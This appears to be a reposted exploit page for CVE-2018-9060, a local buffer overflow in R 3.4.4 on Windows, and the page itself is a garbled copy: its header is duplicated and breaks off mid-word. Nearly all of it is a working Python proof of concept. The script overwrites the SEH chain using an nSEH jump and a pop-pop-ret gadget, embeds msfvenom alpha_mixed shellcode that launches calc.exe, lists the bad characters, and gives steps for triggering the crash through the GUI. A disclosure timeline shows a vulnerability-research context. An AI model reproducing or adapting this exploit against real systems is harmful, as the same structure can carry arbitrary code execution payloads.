R 3.4.4 Local Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 378

#!/usr/bin/python

#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vu #!/usr/bin/python

#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vulnerable Software: R 3.4.4
# Vendor Homepage: https://www.r-project.org/
# Version: 3.4.4
# Software Link: https://cloud.r-project.org/bin/windows/
# Tested On: Windows 7 x86
#
# Timeline:
# 03-27-18: Emailed author, no response
# 04-03-18: Emailed author, no response
# 04-10-18: Emailed author, no response
# 04-23-18: New version released; Submitted public disclosure
#
# lots of bad chars, use alpha_mixed
# badchars x00x0ax0dx0e and x80 through xbf
#
#
# PoC:
# 1. generate r344.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste r344.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#

filename="r344.txt"

junk = "A"*900

#jump 6
nseh = "xebx06xccxcc"

#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll]
seh = "xafx17x3cx64"

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "x00x0ax0dx0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("x89xe1xd9xf7xd9x71xf4x5bx53x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x59x6cx5ax48x4cx42x77x70x53x30x45x50x35x30x6b"
"x39x58x65x70x31x39x50x30x64x4cx4bx50x50x64x70"
"x6ex6bx71x42x34x4cx4ex6bx71x42x37x64x6ex6bx62"
"x52x56x48x36x6fx4cx77x61x5ax64x66x56x51x49x6f"
"x6ex4cx45x6cx75x31x71x6cx53x32x66x4cx55x70x69"
"x51x38x4fx44x4dx47x71x6ax67x78x62x6ax52x31x42"
"x76x37x4ex6bx70x52x44x50x6ex6bx61x5ax47x4cx6c"
"x4bx30x4cx34x51x71x68x4bx53x63x78x77x71x4bx61"
"x63x61x4ex6bx63x69x35x70x56x61x4ex33x6ex6bx57"
"x39x65x48x68x63x44x7ax37x39x6cx4bx46x54x6cx4b"
"x47x71x7ax76x35x61x49x6fx4cx6cx7ax61x6ax6fx64"
"x4dx55x51x4bx77x57x48x6bx50x74x35x69x66x65x53"
"x31x6dx4ax58x77x4bx61x6dx51x34x61x65x6ax44x61"
"x48x4ex6bx62x78x45x74x47x71x79x43x71x76x4cx4b"
"x64x4cx72x6bx6cx4bx73x68x35x4cx43x31x6ax73x6e"
"x6bx37x74x6ex6bx37x71x4ex30x4fx79x52x64x35x74"
"x55x74x71x4bx51x4bx51x71x70x59x72x7ax53x61x6b"
"x4fx59x70x73x6fx63x6fx72x7ax4cx4bx56x72x48x6b"
"x6ex6dx31x4dx50x6ax55x51x6ex6dx4bx35x4fx42x73"
"x30x65x50x55x50x42x70x72x48x70x31x4ex6bx42x4f"
"x6cx47x6bx4fx4ax75x4dx6bx5ax50x48x35x6ex42x31"
"x46x62x48x39x36x5ax35x6fx4dx6dx4dx4bx4fx79x45"
"x45x6cx63x36x73x4cx45x5ax6bx30x59x6bx79x70x50"
"x75x55x55x6dx6bx43x77x42x33x61x62x62x4fx33x5a"
"x33x30x56x33x49x6fx49x45x43x53x53x51x72x4cx53"
"x53x44x6ex65x35x64x38x43x55x67x70x41x41")

fill = "D"*8000

buffer = junk + nseh + seh + calc + fill

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()